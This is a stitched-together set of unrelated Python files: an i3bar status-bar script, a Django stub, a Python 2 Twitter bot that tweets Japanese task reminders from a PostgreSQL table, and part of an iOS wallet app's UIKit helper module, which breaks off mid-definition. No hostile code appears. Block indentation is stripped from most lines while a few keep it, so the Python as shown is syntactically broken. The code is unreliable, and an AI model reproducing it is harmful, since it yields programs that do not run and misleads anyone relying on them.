# f.write(content)
# f.write("\n")
def battery():
dict = {}
status = open('/sys/class/power_supply/BAT0/status').read()
percent = open('/sys/class/power_supply/BAT0/capacity').read()
if 'Charging' in status or 'Full' in status:
charge = True
else:
charge = False
if charge == True:
dict['color'] = '#00ff00'
elif int(percent) > 25:
dict['color'] = '#ffff00'
else:
dict['color'] = '#ff0000'
dict["full_text"] = '{0:^18}'.format(status.replace('\n', '') + ' ('+percent[:-1]+'%)')
dict["name"] = 'bat'
dict["instance"] = '0'
return dict
def datetime():
dict = {}
dict['full_text'] = time.strftime('%d/%m/%y, %I:%M %p (%a)')
dict["name"] = 'time'
dict["instance"] = '0'
return dict
def click_events():
global text
try:
buff = ''
while True:
buff += input()
text = buff[0].replace(',', '') + buff[1:]
try:
obj = json.loads(text)
LOG(str(obj))
if obj["name"] == "vol":
if "relative_x" in obj:
obj["x"] = 1500 + obj["relative_x"] - 47
if obj["button"] == 1 and obj["x"] >= 1500 and obj["x"] <= 1605:
new_vol = 10*((obj["x"] - 1500)/7 + 1)
arr = ["pamixer", "--allow-boost", "--set-volume", str(int(new_vol))]
sp.call(arr)
repaint()
if obj["button"] == 2 or obj["button"] == 3:
sp.call(["bash", "-c", "pavucontrol&"])
except Exception as e:
text = str(e)
buff = ''
except KeyboardInterrupt:
sys.stdout.flush()
pass
def sound():
try:
proc = sp.check_output(["pamixer", "--get-volume"]).replace(b"\n", b"")
except Exception as e:
proc = b"0"
text = u"\u266b " + proc.decode()
bar = []
percent = int(proc)//10
bar = [u'\u2588']*percent + [u'\u2592']*(15-percent)
dict = {'full_text': u'{:>21}'.format(text + " " + ''.join(bar))}
dict["name"] = "vol"
dict["instance"] = "0"
return dict
def bright():
proc = float(sp.check_output(["light"]).replace(b"\n", b''))
text = u"\u2600 "+str(int(proc))+"%"
dict = {'full_text': u'{:^7}'.format(text)}
dict["name"] = "bright"
dict["instance"] = "0"
return dict
def connection(fullName, abbrv):
ifc = sp.Popen(["ifconfig"], stdout=sp.PIPE)
grp = sp.Popen(["grep", "-A", "1", fullName],
stdin=ifc.stdout, stdout=sp.PIPE)
ans = sp.Popen(["sed", "-En",
r"s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p"],
stdin=grp.stdout, stdout=sp.PIPE)
ip = ans.stdout.read().replace(b"\n", b"").decode()
dict = {'name': 'wlan'}
dict["instance"] = "0"
if '.' in ip:
dict["full_text"] = '{:^20}'.format(abbrv + ": "+ip)
dict['color'] = '#44ff11'
else:
dict["full_text"] = '{:^20}'.format(abbrv + ": --.--.--.--" )
dict['color'] = '#ff4411'
return dict
def repaint():
arr = []
create(arr)
print (',', json.dumps(arr))
sys.stdout.flush()
def create(arr):
# global text
# arr.append({'full_text': str(text)})
arr.append(connection('enp', 'E'))
arr.append(connection('wlp', 'W'))
arr.append(bright())
arr.append(sound())
arr.append(battery())
arr.append(datetime())
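# The prints in the main block below follow the i3bar JSON protocol: a header object
# announcing the protocol version and that click events are wanted, then the opening
# bracket of an endless JSON array whose elements are status-line arrays, each element
# after the first prefixed with a comma. A rough sketch of the emitted stream (values
# are illustrative, not from a real run):
#
#   { "version": 1, "click_events": true }
#   [
#   []
#   , [{"full_text": "W: 192.168.1.7", "name": "wlan", "instance": "0"}, ...]
#   , [{"full_text": "W: 192.168.1.7", "name": "wlan", "instance": "0"}, ...]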
if __name__ == '__main__':
th = threading.Thread(target=click_events, args=())
th.start()
print ('{ "version": 1, "click_events": true }')
print ('[')
print ('[]')
repaint()
while True:
repaint()
time.sleep(1)
|
background.py
|
from threading import Thread
from time import sleep
from watersimulation.models import Dataset
def mainThread():
pass
def start():
'''thread = Thread(target = mainThread)
thread.start()
thread.join()
print('.thread finished', end='')
'''
    data = [
        Dataset.objects.all().filter(place="1"),
        Dataset.objects.all().filter(place="2"),
        Dataset.objects.all().filter(place="3"),
        Dataset.objects.all().filter(place="4"),
        Dataset.objects.all().filter(place="5")
    ]
result = []
for d in data:
print(d)
|
tasQ_utf8.py
|
# -*- coding: utf-8 -*-
import tweepy
from tweepy.streaming import StreamListener
from tweepy.error import TweepError
import psycopg2
import urlparse
import os
import sys
import time
import re
import datetime
import threading
tweetlock = threading.Lock()
class TimeoutException(Exception):
pass
class MyListener:
def __init__(self, api, conn, cur):
# register regex
self.rgx_add = re.compile(ur'(?:(\d+)年|)(?:(\d+)月|)(?:(\d+)日|)(?:(\d+)時|)(?:(\d+)分|)(?:(まで)|).*?、(.+)'.encode('utf-8'), re.U)
self.rgx_showtask = re.compile(ur'^予定'.encode('utf-8'), re.U)
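        # The add-command regex above parses Japanese date expressions of the form
        # "[YYYY年][MM月][DD日][HH時][MM分][まで]、task text": every unit is optional,
        # "まで" ("until") marks the entry as a deadline, and the text after the
        # full-width comma is the task body. rgx_showtask matches replies starting
        # with "予定" ("schedule"), which list the stored tasks. An illustrative parse
        # (captures come back as UTF-8 byte strings under Python 2):
        #
        #   "5月1日18時30分まで、レポート提出"
        #     -> year=None, month=5, day=1, hour=18, minute=30, deadline=True,
        #        task="レポート提出" ("submit the report")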
# set api
self.api = api
self.conn = conn
self.cur = cur
def on_status(self, status):
if(status.in_reply_to_user_id == self.api.me().id):
# parse status
try:
self.parse(status.text, status)
except TweepError as e:
print e.message
except ValueError as e:
print u"コマンドが正しくないです。".encode('utf-8')
screennameWithAt = u'@'+self.api.me().screen_name
reply_str = status.text.replace(screennameWithAt, u'')
with tweetlock:
self.api.update_status(None, u"@"+status.author.screen_name+u" "+u"コマンドが正しくないです(ValueError)。「"+reply_str+u"」", in_reply_to_status_id=status.id)
def getTimeDeltaLevel(self, td):
if td > datetime.timedelta(31):
return 6
elif td > datetime.timedelta(7):
return 5
elif td > datetime.timedelta(1):
return 4
elif td > datetime.timedelta(days=0, hours=6):
return 3
elif td > datetime.timedelta(days=0, hours=1):
return 2
elif td > datetime.timedelta(days=0, minutes=30):
return 1
else:
return 0
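    # The levels returned above map remaining time to the reminder stages consumed by
    # checkSchedule() further down in this file:
    #
    #   level 6: more than 31 days left      level 2: more than 1 hour left
    #   level 5: more than 7 days left       level 1: more than 30 minutes left
    #   level 4: more than 1 day left        level 0: 30 minutes or less / due
    #   level 3: more than 6 hours left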
def parse(self, reply_str, reply_status):
print "call parse"
#parse reply string
#delete @[screen_name]
screennameWithAt = u'@'+self.api.me().screen_name
reply_str = reply_str.replace(screennameWithAt, u'')
reply_str = reply_str.replace(u' ', u'')
reply_str = reply_str.replace(u' ', u'')
print reply_str.encode('utf-8')
date_now = datetime.datetime.now()
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, date_now.hour, date_now.minute)
print date_now
print date_to_add
if (self.rgx_add.match(reply_str.encode('utf-8')) != None): # add command accepted
y, mo, d, h, mi = self.rgx_add.match(reply_str.encode('utf-8')).groups()[0:5]
print self.rgx_add.match(reply_str.encode('utf-8')).groups()
y = int(y) if y!=None else None
mo = int(mo) if mo!=None else None
d = int(d) if d!=None else None
h = int(h) if h!=None else None
mi = int(mi) if mi!=None else None
if(y==None and mo==None and d==None and h!=None and mi==None): #h時
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, h)
elif(y==None and mo==None and d==None and h!=None and mi!=None): #h時mi分
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, h, mi)
elif(y==None and mo!=None and d!=None and h==None and mi==None): #mo月d日
date_to_add = datetime.datetime(date_now.year, mo, d)
elif(y==None and mo!=None and d!=None and h!=None and mi==None): #mo月d日h時
date_to_add = datetime.datetime(date_now.year, mo, d, h)
elif(y==None and mo!=None and d!=None and h!=None and mi!=None): #mo月d日h時mi分
date_to_add = datetime.datetime(date_now.year, mo, d, h, mi)
elif(y!=None and mo!=None and d!=None and h==None and mi==None): #y年mo月d日
date_to_add = datetime.datetime(y, mo, d)
elif(y!=None and mo!=None and d!=None and h!=None and mi==None): #y年mo月d日h時
date_to_add = datetime.datetime(y, mo, d, h)
elif(y!=None and mo!=None and d!=None and h!=None and mi!=None): #y年mo月d日h時mi分
date_to_add = datetime.datetime(y, mo, d, h, mi)
else: #invalid data
date_to_add = None
isDeadline = self.rgx_add.match(reply_str.encode('utf-8')).groups()[5] != None
print date_to_add
#add to database
if(date_to_add == None):
raise ValueError
self.cur.execute('insert into tasks values (%s, %s, %s, %s, %s)', (reply_status.author.id, date_to_add, self.rgx_add.match(reply_str.encode('utf-8')).groups()[6], isDeadline, self.getTimeDeltaLevel(date_to_add - date_now)))
self.conn.commit()
with tweetlock:
self.api.update_status(None, u"@"+reply_status.author.screen_name+u" "+u"予定を追加「"+reply_str+u"」", in_reply_to_status_id=reply_status.id)
elif (self.rgx_showtask.match(reply_str.encode('utf-8')) != None):
print u'予定'.encode('utf-8')
self.cur.execute('select * from tasks order by date')
all_tasks = u''
for t in self.cur.fetchall():
#t[2] is task t[1] is date
if(self.api.get_user(t[0]).id == reply_status.author.id):
all_tasks=all_tasks+str(t[1]).decode('utf-8')+u'に'+str(t[2]).decode('utf-8')+u'。'
len_str = len(all_tasks)
all_tasks_list = [all_tasks[i:i+100] for i in range(0, len_str, 100)]
print all_tasks_list
for tw in all_tasks_list:
with tweetlock:
tw = u"@"+reply_status.author.screen_name+u' '+tw
self.api.update_status(None, tw, in_reply_to_status_id=reply_status.id)
else:
# search mode
self.cur.execute('select * from tasks order by date')
search_result = u''
is_found = False
for t in self.cur.fetchall():
# t[2] is task t[1] is date
if(self.api.get_user(t[0]).id == reply_status.author.id):
if(reply_str in str(t[2]).decode('utf-8')):
is_found = True
search_result = search_result + str(t[1]).decode('utf-8')+u'に'+str(t[2]).decode('utf-8')+u'。'
if(is_found is False):
search_result = u'予定が見つからないです。'
len_str = len(search_result)
search_result_list = [search_result[i:i+100] for i in range(0, len_str, 100)]
for tw in search_result_list:
with tweetlock:
tw = u"@"+reply_status.author.screen_name+u' '+tw
self.api.update_status(None, tw, in_reply_to_status_id=reply_status.id)
#schedule
def checkSchedule(api,conn,cur):
while True:
time.sleep(60)
print "scheduler wake"
#get current date
datenow = datetime.datetime.now()
print datenow
#send query
cur.execute('select * from tasks')
for t in cur.fetchall():
#check date
print t
if(t[1] <= datenow):
#delete
print "delete"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"の時刻です")
except TweepError as e:
print e.message
try:
cur.execute('delete from tasks where user_id=%s and date=%s and task=%s and is_deadline=%s', t[0:4])
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(31) and t[4] == 6):
# last 1 month
print "1 month"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと約1ヶ月です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(7) and t[4] == 5):
# last 1 week
print "1 week"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1週間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(1) and t[4] == 4):
# last 1 day
print "1 day"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1日です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, hours=6) and t[4] == 3):
# last 6 hour
print "6 hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと6時間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, hours=1) and t[4] == 2):
# last 1 hour
print "1 hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1時間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, minutes=30) and t[4] == 1):
                # last 30 minutes
print "half hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと30分です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
conn.commit()
print "read to sleep"
if __name__ == '__main__':
#authorization
consumerKey = os.environ['CONSUMER_KEY']
consumerSecret = os.environ['CONSUMER_SECRET']
accessToken = os.environ['ACCESS_TOKEN']
accessSecret = os.environ['ACCESS_SECRET']
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessSecret)
api = tweepy.API(auth)
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
    cur = conn.cursor()
print u"セット完了".encode('utf-8')
thr = threading.Thread(target=checkSchedule, name="scheduler", args=(api,conn,cur))
thr.setDaemon(True)
thr.start()
print "thread start"
#initialize listener
listner = MyListener(api, conn, cur)
since_id = 0
first_exec = True
j_i_k_o_id = 535427149
#get 10 tweets from j_i_k_o's timeline
while True:
time.sleep(30)
print "usertimelinescheduler wake"
print "since id={0}".format(since_id)
statuses = []
if first_exec:
statuses = api.user_timeline(j_i_k_o_id, count=10)
else:
statuses = api.user_timeline(j_i_k_o_id, since_id=since_id, count=10)
for status in statuses:
listner.on_status(status)
if len(statuses) != 0:
since_id = statuses[0].id
first_exec = False
|
utils.py
|
#!/usr/bin/env python3
#
# Oregano - lightweight Ergon client
# Copyright (C) 2012 thomasv@gitorious
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, os, json, qrcode, qrcode.image.svg, tempfile, random, queue, threading, time, stat
from collections import namedtuple
from inspect import signature
from typing import Callable, Any, Tuple
from .uikit_bindings import *
from .custom_objc import *
from oregano.i18n import _
from oregano.util import PrintError
def is_2x_screen() -> bool:
    return UIScreen.mainScreen.scale > 1.0
def is_iphone() -> bool:
return bool(UI_USER_INTERFACE_IDIOM() == UIUserInterfaceIdiomPhone)
def is_iphone5() -> bool:
# iphone5 has 1136 pix height
return is_iphone() and ( abs(UIScreen.mainScreen.nativeBounds.size.height - 1136.0) < 0.5 )
def is_iphone4() -> bool:
# iphone4 has <1136 pix height
return is_iphone() and ( UIScreen.mainScreen.nativeBounds.size.height - 1136.0 < -0.5 )
def is_iphoneX() -> bool:
if is_iphone():
def iphone_X_sizes() -> Tuple[CGSize]:
return (
CGSizeMake( 1125.0, 2436.0 ), # iPhone X & iPhone XS
CGSizeMake( 828.0, 1792.0 ), # iPhone XR
CGSizeMake( 1242.0, 2688.0 ), # iPhone XS Max
)
size = UIScreen.mainScreen.nativeBounds.size
for s in iphone_X_sizes():
if abs(s.width - size.width) < 0.5 and abs(s.height - size.height) < 0.5:
return True
return False
def is_ipad() -> bool:
return not is_iphone()
def is_landscape() -> bool:
o = UIApplication.sharedApplication.statusBarOrientation
return bool(o in [UIInterfaceOrientationLandscapeLeft,UIInterfaceOrientationLandscapeRight])
def is_portrait() -> bool:
return not is_landscape()
def is_debug_build() -> bool:
return bool(HelpfulGlue.isDebugBuild())
def is_simulator() -> bool:
return bool(HelpfulGlue.isSimulator())
def get_fn_and_ext(fileName: str) -> tuple:
*p1, ext = fileName.split('.')
fn=''
    if len(p1) == 0:
fn = ext
ext = None
else:
fn = '.'.join(p1)
return (fn,ext)
def get_user_dir():
dfm = NSFileManager.defaultManager
    # documents dir: 9 = NSDocumentDirectory, 1 = NSUserDomainMask
    thedir = dfm.URLsForDirectory_inDomains_(9, 1).objectAtIndex_(0)
return str(thedir.path)
def get_tmp_dir():
return str(ObjCInstance(uikit.NSTemporaryDirectory()))
def uiview_set_enabled(view : ObjCInstance, b : bool) -> None:
if view is None: return
view.userInteractionEnabled = bool(b)
view.alpha = float(1.0 if bool(b) else 0.3)
view.setNeedsDisplay()
def pathsafeify(s : str) -> str:
return s.translate({ord(i):None for i in ':/.\$#@[]}{*?'}).strip()
def cleanup_tmp_dir():
t0 = time.time()
d = get_tmp_dir()
ct = 0
tot = 0
import glob
if os.path.isdir(d):
it = glob.iglob(os.path.join(d,'*'))
for f in it:
tot += 1
try:
os.remove(f)
ct += 1
except:
#NSLog("Cleanup Tmp Dir: failed to remove tmp file: %s", f)
pass
if tot:
NSLog("Cleanup Tmp Dir: removed %d/%d files from tmp dir in %f ms",ct,tot,(time.time()-t0)*1e3)
def ios_version_string() -> str:
return "%s %s %s (%s)"%ios_version_tuple_full()
_VER_TUP_FULL = None
def ios_version_tuple_full() -> Tuple[str]:
global _VER_TUP_FULL
if _VER_TUP_FULL is None:
dev = UIDevice.currentDevice
_VER_TUP_FULL = (str(dev.systemName), str(dev.systemVersion), str(dev.model), str(dev.identifierForVendor))
return _VER_TUP_FULL
_VER_TUP = None
def ios_version_tuple() -> Tuple[int]:
global _VER_TUP
if _VER_TUP is None:
def parse_tup():
try:
sv = ios_version_tuple_full()[1].split('.')
while len(sv) < 3: # because we can never rely on Apple not making this have 2 or 4 elements, etc...
sv += ['0']
sv = tuple(int(x) for x in sv) # convert to tuple
return sv
except (IndexError, TypeError, ValueError) as e:
print("ERROR in ios_version_tuple, cannot parse", sv, " -- returning (0,0,0); exception was:", repr(e))
return 0,0,0
_VER_TUP = parse_tup()
return _VER_TUP
# new color scheme from Max
_ColorScheme = None
def uicolor_custom(name : str) -> ObjCInstance:
global _ColorScheme
name = name.strip().lower() if name else ""
if not _ColorScheme:
        # initialize it on first call. We don't initialize it on initial module load to shave a few ms off app loading time.
_ColorScheme = {
'dark' : UIColor.colorInDeviceRGBWithHexString_("#414141").retain(),
'light' : UIColor.colorInDeviceRGBWithHexString_("#CCCCCC").retain(),
'ultralight': UIColor.colorInDeviceRGBWithHexString_("#F6F6F6").retain(),
'nav' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'link' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'linktapped': UIColor.colorInDeviceRGBWithHexString_("#FF8BFF").retain(),
'navtint' : UIColor.colorInDeviceRGBWithHexString_("#FFFFFF").retain(),
'red' : UIColor.colorInDeviceRGBWithHexString_("#FF6161").retain(),
'notif' : UIColor.colorInDeviceRGBWithHexString_("#BBFF3B").retain(), # very bright green
'green' : UIColor.colorInDeviceRGBWithHexString_("#9BDF1B").retain(), # less bright green
}
schemecolor = _ColorScheme.get(name, None)
if schemecolor:
return schemecolor
# other, old-style colors. These will be removed once we fully transition to new UI style
if name in ['blue', 'myblue', 'tf', 'password']:
return UIColor.colorWithRed_green_blue_alpha_(0.91746425629999995, 0.95870447160000005, 0.99979293349999998, 1.0)
if name in ['change', 'changeaddress', 'change address']:
return UIColor.colorWithRed_green_blue_alpha_(1.0,0.9,0.3,0.3)
if name in ['frozen', 'frozenaddress', 'frozen address']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.125)
if name in ['frozentext', 'frozen text', 'frozenaddresstext', 'frozen address text']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,1.0)
if name in ['frozentextbright', 'frozen text bright', 'frozenaddresstextbright', 'frozen address text bright']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.8,0.8,1.0)
if name in ['frozentextlight', 'frozen text light', 'frozenaddresstextlight', 'frozen address text light']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.4)
NSLog("uicolor_custom: UNKNOWN custom color '%s' -- returning GRAY -- FIXME"%(str(name)))
return UIColor.grayColor
def tintify(t : ObjCInstance) -> ObjCInstance:
# setup nav tint colors
t.navigationBar.setTranslucent_(False)
t.navigationBar.barTintColor = uicolor_custom('nav')
t.navigationBar.tintColor = uicolor_custom('navtint')
t.navigationBar.barStyle = UIBarStyleBlack
return t
def ats_replace_font(ats : NSAttributedString, font: UIFont) -> NSMutableAttributedString:
out = NSMutableAttributedString.alloc().initWithAttributedString_(ats)
r = NSRange(0, out.length())
out.removeAttribute_range_(NSFontAttributeName, r)
out.addAttribute_value_range_(NSFontAttributeName, font, r)
return out
def uitf_redo_attrs(tf : ObjCInstance) -> None:
weight = UIFontWeightMedium if tf.tag == 1 else UIFontWeightRegular
# TESTING ATTRIBUTED STRING STUFF..
# 1. Placeholder
ats = NSMutableAttributedString.alloc().initWithString_(tf.placeholder).autorelease()
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.italicSystemFontOfSize_(14.0), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('light'), r)
ps = NSMutableParagraphStyle.new().autorelease()
ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
ps.lineBreakMode = NSLineBreakByTruncatingMiddle
indent = nspy_get_byname(tf, 'indent_override')
if isinstance(indent, (float, int)):
indent = float(indent)
else:
indent = 10.0 if tf.isUserInteractionEnabled() else 0.0
ps.firstLineHeadIndent = indent
ps.tailIndent = -indent
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedPlaceholder = ats
# 2. Actual text
ats = NSMutableAttributedString.alloc().initWithString_(tf.text)
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.systemFontOfSize_weight_(14.0, weight), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('dark'), r)
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedText = ats
# NB: This isn't normally called since you need to specify the full pathname of the resource you want, instead
# if you need images, call uiimage_get, etc. This does NOT search recursively, since NSBundle sucks.
def get_bundle_resource_path(fileName: str, directory: str = None) -> str:
fn,ext = get_fn_and_ext(fileName)
if directory is None:
return NSBundle.mainBundle.pathForResource_ofType_(fn, ext)
return NSBundle.mainBundle.pathForResource_ofType_inDirectory_(fn, ext, directory)
def nsattributedstring_from_html(html : str) -> ObjCInstance:
data = ns_from_py(html.encode('utf-8'))
return NSMutableAttributedString.alloc().initWithHTML_documentAttributes_(data,None).autorelease()
def uilabel_replace_attributed_text(lbl : ObjCInstance, text : str, template : ObjCInstance = None, font : ObjCInstance = None) -> ObjCInstance:
if not isinstance(template, NSAttributedString):
template = lbl.attributedText
if template is None:
            template = NSAttributedString.new().autorelease()
astr = NSMutableAttributedString.alloc().initWithAttributedString_(template).autorelease()
astr.replaceCharactersInRange_withString_(NSRange(0,astr.length()), text)
if font:
r = NSRange(0,astr.length())
astr.removeAttribute_range_(NSFontAttributeName,r)
astr.addAttribute_value_range_(NSFontAttributeName,font,r)
lbl.attributedText = astr
return lbl
def nsurl_read_local_file(url : ObjCInstance, binary = False) -> tuple:
try:
cstring = NSMutableData.dataWithLength_(4096)
from ctypes import c_char_p
url.getFileSystemRepresentation_maxLength_(c_char_p(cstring.mutableBytes), 4096)
filename = py_from_ns(cstring)
nul = filename.find(b'\0')
if nul >= 0:
filename = filename[:nul]
filename = filename.decode('utf-8')
mode = "r"
if binary: mode = "rb"
with open(filename, mode) as f:
data = f.read()
#print("File data:\n",data)
return data, filename
except:
NSLog("nsurl_read_local_file got exception: %s",str(sys.exc_info()[1]))
return None, None
_threading_original__init__ = None
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
global _threading_original__init__
if _threading_original__init__:
NSLog("*** ERROR: setup_thread_excepthook already called once in this app!")
return
_threading_original__init__ = threading.Thread.__init__
def MyInit(self, *args, **kwargs):
_threading_original__init__(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except ConnectionError:
NSLog("ConnectionError: %s",str(sys.exc_info()[1]))
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = MyInit
def cleanup_thread_excepthook():
global _threading_original__init__
if _threading_original__init__:
threading.Thread.__init__ = _threading_original__init__
_threading_original__init__ = None
###################################################
### Show Share ActionSheet
###################################################
def show_share_actions(vc : ObjCInstance,
fileName : str = None,
text : str = None,
url : NSURL = None,
img : UIImage = None,
excludedActivityTypes = None,
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
ipadAnchor : object = None,
animated : bool = True,
                       finishedCompletion: Callable[[str], None] = None, # optional completion function that gets called when the share activity finishes. the string passed is the UIActivityType the user selected, or None if the user cancelled the activity
objectName : str = None # the descriptive name of the object eg 'File' or 'Transaction' or 'Wallet', translated
) -> ObjCInstance:
objectName = _("File") if not objectName or not isinstance(objectName, str) else objectName
items = []
if fileName:
items.append(NSURL.fileURLWithPath_(fileName))
if isinstance(text, str):
items.append(ns_from_py(text))
if isinstance(url, NSURL):
items.append(url)
if isinstance(img, UIImage):
items.append(img)
avc = UIActivityViewController.alloc().initWithActivityItems_applicationActivities_(items, None).autorelease()
if excludedActivityTypes is None:
excludedActivityTypes = [
UIActivityTypePostToFacebook,
UIActivityTypePostToTwitter,
UIActivityTypePostToWeibo,
UIActivityTypeAssignToContact,
UIActivityTypeSaveToCameraRoll,
UIActivityTypeAddToReadingList,
UIActivityTypePostToFlickr,
UIActivityTypePostToVimeo,
UIActivityTypePostToTencentWeibo,
UIActivityTypeOpenInIBooks,
]
if isinstance(img, UIImage):
excludedActivityTypes.remove(UIActivityTypeSaveToCameraRoll)
avc.excludedActivityTypes = excludedActivityTypes
if is_ipad():
popover = avc.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
def onCompletion() -> None:
if completion is not None:
#print("Calling completion callback..")
completion()
def ActivityCompletion(s : objc_id, completed : bool, arr : objc_id, err : objc_id) -> None:
activity = py_from_ns(ObjCInstance(s)) if completed else None
def DoUserCompl() -> None:
if callable(finishedCompletion):
finishedCompletion(activity)
print('activity =',activity)
if err and err.value:
err = ObjCInstance(err)
show_alert(vc = vc, title = "Error", message = str(err), actions = [ [_('OK'), DoUserCompl] ])
else:
DoUserCompl()
if activity is None: return
        if activity in (py_from_ns(UIActivityTypeCopyToPasteboard),):
show_notification(message = _("{} copied to clipboard").format(objectName))
elif activity in ('com.apple.CloudDocsUI.AddToiCloudDrive', py_from_ns(UIActivityTypeAirDrop)):
show_notification(message = _("{} saved successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypeMessage),py_from_ns(UIActivityTypeMail)):
show_notification(message = _("{} sent successfully").format(objectName))
        elif activity in (py_from_ns(UIActivityTypePrint),):
show_notification(message = _("{} sent to printer").format(objectName))
        elif activity in (py_from_ns(UIActivityTypeSaveToCameraRoll),):
show_notification(message = _("{} saved to photo library").format(objectName))
else:
show_notification(message = _("{} exported successfully").format(objectName))
avc.completionWithItemsHandler = Block(ActivityCompletion)
vc.presentViewController_animated_completion_(avc,animated,onCompletion)
return avc
###################################################
### Show modal alert
###################################################
def show_please_wait(vc : ObjCInstance, message : str, animated : bool = True, completion : Callable[[],None] = None,
title: str = None) -> ObjCInstance:
pw = None
try:
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("PleaseWait", None, None)
for o in objs:
if isinstance(o, PleaseWaitVC):
pw = o
break
except:
NSLog("Could not load PleaseWait.nib:",sys.exc_info()[1])
title = title or _("Please wait")
if not pw:
return show_alert(vc, title = title, message = message, actions = [], animated = animated, completion = completion)
pw.message.text = message
pw.pleaseWait.text = title
vc.presentViewController_animated_completion_(pw, animated, completion)
return pw
def show_alert(vc : ObjCInstance, # the viewcontroller to present the alert view in
title : str, # the alert title
message : str, # the alert message
# actions is a list of lists: each element has: Button names, plus optional callback spec
# each element of list is [ 'ActionTitle', callable, arg1, arg2... ] for optional callbacks
